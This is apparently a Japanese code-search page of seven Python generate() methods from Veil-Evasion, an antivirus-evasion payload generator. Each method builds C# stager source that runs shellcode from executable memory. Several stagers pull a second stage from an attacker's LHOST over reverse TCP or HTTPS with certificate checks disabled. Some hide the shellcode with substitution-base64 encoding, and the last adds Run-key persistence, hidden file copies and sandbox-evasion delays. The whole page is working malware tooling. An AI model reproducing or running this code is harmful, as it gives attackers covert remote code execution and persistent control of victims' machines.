コード例 #1
0
ファイル: virtual.py プロジェクト: RazerVenom/Veil-Evasion
    def generate(self):

        Shellcode = self.shellcode.generate()
        Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        bytearrayName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

        payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace %s { class %s  { static void Main() {\n" % (namespaceName, className)
        payloadCode += "byte[] %s = {%s};" % (bytearrayName,Shellcode)

        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)
        # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #2
0
    def generate(self):

        Shellcode = self.shellcode.generate(self.required_options)
        Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        bytearrayName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

        payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace %s { class %s  { static void Main() {\n" % (namespaceName, className)
        payloadCode += "byte[] %s = {%s};" % (bytearrayName,Shellcode)

        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)
        # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #3
0
    def generate(self):

        # imports and namespace setup
        payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

        # code for the randomString() function
        randomStringName = helpers.randomString()
        bufferName = helpers.randomString()
        charsName = helpers.randomString()
        t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)


        # logic to turn off certificate validation
        validateServerCertficateName = helpers.randomString()
        payloadCode += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" %(validateServerCertficateName)


        # code for the randomString() method
        payloadCode += "static string %s(Random r, int s) {\n" %(randomStringName)
        payloadCode += "char[] %s = new char[s];\n"%(bufferName)
        payloadCode += "string %s = \"%s\";\n" %(charsName, chars)
        payloadCode += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
        payloadCode += "return new string(%s);}\n" %(bufferName)


        # code for the checksum8() function
        checksum8Name = helpers.randomString()
        payloadCode += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)


        # code fo the genHTTPChecksum() function
        genHTTPChecksumName = helpers.randomString()
        baseStringName = helpers.randomString()
        randCharsName = helpers.randomString()
        urlName = helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payloadCode += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
        payloadCode += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
        payloadCode += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
        payloadCode += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
        payloadCode += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
        payloadCode += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)


        # code for getData() function
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()

        payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
        payloadCode += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName)
        payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
        payloadCode += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
        payloadCode += "byte[] %s = null;\n" %(sName)
        payloadCode += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
        payloadCode += "if (%s.Length < 100000) return null;}\n" %(sName)
        payloadCode += "catch (WebException) {}\n"
        payloadCode += "return %s;}\n" %(sName)


        # code fo the inject() function to inject shellcode
        injectName = helpers.randomString()
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
        payloadCode += "    if (%s != null) {\n" %(sName)
        payloadCode += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
        payloadCode += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
        payloadCode += "        UInt32 %s = 0;\n" %(threadIdName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
        payloadCode += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)


        # code for Main() to launch everything
        sName = helpers.randomString()
        randomName = helpers.randomString()

        payloadCode += "static void Main(){\n"
        payloadCode += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
        payloadCode += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
        payloadCode += "%s(%s);}\n" %(injectName, sName)

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #4
0
ファイル: rev_tcp.py プロジェクト: rolandoanton/Veil-Evasion
    def generate(self):

        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        payloadCode = (
            "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        )
        payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        payloadCode += "static byte[] %s(string %s, int %s) {\n" % (getDataName, hostName, portName)
        payloadCode += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (ipName, hostName, portName)
        payloadCode += (
            "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n"
            % (sockName)
        )
        payloadCode += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payloadCode += "    catch { return null;}\n"
        payloadCode += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payloadCode += "    %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName)
        payloadCode += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (lengthName, length_rawName)
        payloadCode += "    byte[] %s = new byte[%s + 5];\n" % (sName, lengthName)
        payloadCode += "    int %s = 0;\n" % (total_bytesName)
        payloadCode += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payloadCode += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName,
            sockName,
            sName,
            total_bytesName,
            lengthName,
            total_bytesName,
            lengthName,
            total_bytesName,
        )
        payloadCode += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (handleName, sockName)
        payloadCode += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (handleName, sName, sName)
        payloadCode += "    return %s;}\n" % (sName)

        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        payloadCode += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payloadCode += "    if (%s != null) {\n" % (sName)
        payloadCode += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, sName)
        payloadCode += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (sName, funcAddrName, sName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payloadCode += "        UInt32 %s = 0;\n" % (threadIdName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payloadCode += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
            hThreadName,
            funcAddrName,
            pinfoName,
            threadIdName,
        )
        payloadCode += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)

        sName = helpers.randomString()
        payloadCode += "static void Main(){\n"
        payloadCode += '    byte[] %s = null; %s = %s("%s", %s);\n' % (
            sName,
            sName,
            getDataName,
            self.required_options["LHOST"][0],
            self.required_options["LPORT"][0],
        )
        payloadCode += "    %s(%s); }\n" % (injectName, sName)

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]
        payloadCode += (
            """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""
            % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
        )

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #5
0
    def generate(self):

        Shellcode = self.shellcode.generate(self.required_options)

        # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
        key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
        base64payload = encryption.b64sub(Shellcode,key)

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        shellcodeName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        baseStringName = helpers.randomString()
        targetStringName = helpers.randomString()

        decodeFuncName = helpers.randomString()
        base64DecodeFuncName = helpers.randomString()
        dictionaryName = helpers.randomString()


        payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;"
        payloadCode += "using System.Collections.Generic; using System.Runtime.InteropServices;\n"

        payloadCode += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (namespaceName, className, decodeFuncName)
        payloadCode += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" %(baseStringName)
        payloadCode += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" %(targetStringName,dictionaryName)
        payloadCode += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" %(baseStringName,dictionaryName,baseStringName)
        payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" %(targetStringName, dictionaryName)
        payloadCode += "else { %s += t[i]; }} return %s; }\n" %(targetStringName,targetStringName)


        encodedDataName = helpers.randomString()
        encodedBytesName = helpers.randomString()

        payloadCode += "static public string %s(string %s) {\n" %(base64DecodeFuncName,encodedDataName)
        payloadCode += "byte[] %s = System.Convert.FromBase64String(%s);\n" %(encodedBytesName,encodedDataName)
        payloadCode += "return System.Text.ASCIIEncoding.ASCII.GetString(%s);}\n" %(encodedBytesName)

        base64PayloadName = helpers.randomString()
        payloadCode += "static void Main() {\n"
        payloadCode += "string %s = \"%s\";\n" % (base64PayloadName, base64payload)
        payloadCode += "string key = \"%s\";\n" %(key)
        payloadCode += "string p = (%s(%s(%s, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n" %(base64DecodeFuncName, decodeFuncName, base64PayloadName)
        payloadCode += "string[] chars = p.Split(',').ToArray();\n"
        payloadCode += "byte[] %s = new byte[chars.Length];\n" %(shellcodeName)
        payloadCode += "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n"  %(shellcodeName)

        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

        # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #6
0
    def generate(self):

        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        payloadCode += "static byte[] %s(string %s, int %s) {\n" %(getDataName, hostName, portName)
        payloadCode += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" %(ipName, hostName, portName)
        payloadCode += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" %(sockName)
        payloadCode += "    try { %s.Connect(%s); }\n" %(sockName, ipName)
        payloadCode += "    catch { return null;}\n"
        payloadCode += "    byte[] %s = new byte[4];\n" %(length_rawName)
        payloadCode += "    %s.Receive(%s, 4, 0);\n" %(sockName, length_rawName)
        payloadCode += "    int %s = BitConverter.ToInt32(%s, 0);\n" %(lengthName, length_rawName)
        payloadCode += "    byte[] %s = new byte[%s + 5];\n" %(sName, lengthName)
        payloadCode += "    int %s = 0;\n" %(total_bytesName)
        payloadCode += "    while (%s < %s)\n" %(total_bytesName, lengthName)
        payloadCode += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" %(total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName)
        payloadCode += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" %(handleName, sockName)
        payloadCode += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" %(handleName, sName, sName)
        payloadCode += "    return %s;}\n" %(sName)


        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
        payloadCode += "    if (%s != null) {\n" %(sName)
        payloadCode += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
        payloadCode += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
        payloadCode += "        UInt32 %s = 0;\n" %(threadIdName)
        payloadCode += "        IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
        payloadCode += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)


        sName = helpers.randomString()
        payloadCode += "static void Main(){\n"
        payloadCode += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" %(sName, sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0])
        payloadCode += "    %s(%s); }\n" %(injectName, sName)


        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        if self.required_options["use_arya"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)

        return payloadCode
コード例 #7
0
    def generate(self):

        Shellcode = self.shellcode.generate(self.required_options)

        # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
        key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
        base64payload = encryption.b64sub(Shellcode,key)

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        shellcodeName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        baseStringName = helpers.randomString()
        targetStringName = helpers.randomString()

        decodeFuncName = helpers.randomString()
        base64DecodeFuncName = helpers.randomString()
        dictionaryName = helpers.randomString()

        runShellCode = helpers.randomString()
 
 
        persistanceFuncName = helpers.randomString()
        fileNamePayload = helpers.randomString()
        startup = helpers.randomString()
        destFile = helpers.randomString()
	runBinderFile	= helpers.randomString()
        user = helpers.randomString()
        admin = helpers.randomString()
        reg = helpers.randomString()
        iFileName = helpers.randomString()
        regFileName = helpers.randomString()      

        hglobal = helpers.randomString()
        MAX_OP = helpers.randomString()
        cpt	= helpers.randomString()
        time1	= helpers.randomString()
        time2   = helpers.randomString()
 
 

        payloadCode = "using System; using System.IO; using System.Net; using System.Text; using System.Linq; using Microsoft.Win32; using System.Threading; using System.Diagnostics; using System.Net.Sockets;"
        payloadCode += "using System.Collections.Generic; using System.Security.Principal;using System.Runtime.InteropServices;\n"
        
	payloadCode += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (namespaceName, className, decodeFuncName)
        payloadCode += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" %(baseStringName)
        payloadCode += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" %(targetStringName,dictionaryName)
        payloadCode += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" %(baseStringName,dictionaryName,baseStringName)
        payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" %(targetStringName, dictionaryName)
        payloadCode += "else { %s += t[i]; }} return %s; }\n" %(targetStringName,targetStringName)        
        
        payloadCode += "static public void %s()	{ \n"% (persistanceFuncName)
        payloadCode += "string %s = AppDomain.CurrentDomain.FriendlyName.ToString(); \n"% (fileNamePayload)
        payloadCode += "string %s = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); \n"% (startup)
        payloadCode += "string %s = System.IO.Path.Combine(%s, %s);\n"% (destFile,startup,fileNamePayload)
        payloadCode += "try { WindowsIdentity %s = WindowsIdentity.GetCurrent();\n"% (user)
        payloadCode += "WindowsPrincipal %s = new WindowsPrincipal(%s);"% (admin,user)
        payloadCode += "%s.IsInRole(WindowsBuiltInRole.Administrator); "% (admin)          
        payloadCode += "if (Directory.Exists(%s)) { if (!File.Exists(%s)) {\n"% (startup,destFile)
        payloadCode += "System.IO.File.Copy(%s, %s); \n"% (fileNamePayload,destFile)
        payloadCode += "File.SetAttributes(%s, FileAttributes.Hidden);\n"% (destFile)
        payloadCode += "RegistryKey %s = Registry.CurrentUser.CreateSubKey(@\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\");\n"% (reg)
        payloadCode += "int %s = %s.Length - 4;\n"% (iFileName,fileNamePayload)
        payloadCode += "string %s = %s.Substring(0, %s);\n"% (regFileName,fileNamePayload,iFileName)
        payloadCode += " %s.SetValue(%s, %s + @\"\\\" + %s);\n"% (reg,regFileName, startup,fileNamePayload)
        payloadCode += "%s.Close(); Process.Start(%s);Environment.Exit(0);"%(reg,destFile) 	
	payloadCode += "}}}finally{%s();}}"%(runShellCode)
	# get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

	# payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); \n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

	base64PayloadName = helpers.randomString()

        payloadCode += "static public void %s(){string %s = \"%s\";\n" % (runShellCode,base64PayloadName, base64payload)
        payloadCode += "string key = \"%s\";\n" %(key)
        payloadCode += "string p = (%s(%s(%s, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n" %(base64DecodeFuncName, decodeFuncName, base64PayloadName)
        payloadCode += "string[] chars = p.Split(',').ToArray();\n"
        payloadCode += "byte[] %s = new byte[chars.Length];\n" %(shellcodeName)		     
        payloadCode += "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); } \n"  %(shellcodeName)
        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length); \n" % (shellcodeName, funcAddrName, shellcodeName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero; \n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s); \n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)



        encodedDataName = helpers.randomString()
        encodedBytesName = helpers.randomString()

        payloadCode += "static public string %s(string %s) {\n" %(base64DecodeFuncName,encodedDataName)
        payloadCode += "byte[] %s = System.Convert.FromBase64String(%s);\n" %(encodedBytesName,encodedDataName)
        payloadCode += "return System.Text.ASCIIEncoding.ASCII.GetString(%s);}\n" %(encodedBytesName)
        	
        

        payloadCode += "static void Main() 	{\n"
        payloadCode += "IntPtr %s = Marshal.AllocHGlobal(400000000); int %s = 100000000; int %s = 0;\n" %(hglobal,MAX_OP,cpt)
        payloadCode += "if (%s != null ) { \n" %(hglobal)               
        payloadCode += "var %s = DateTime.Now.Millisecond; Thread.Sleep(25000); var %s = DateTime.Now.Millisecond;\n" %(time1,time2)
        payloadCode += "if ((%s < (%s + 120000))) { for (int i = 0; i < %s+1; i++)\n" %(time2,time1,MAX_OP)
        payloadCode += "{%s++; if (%s == %s) {\n" %(cpt,cpt,MAX_OP)
        payloadCode += 	"%s(); %s = Marshal.AllocCoTaskMem(0);}}}}}\n" %(persistanceFuncName,hglobal)      
        payloadCode += "}}" #End namespace

			

         
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)
            
        return payloadCode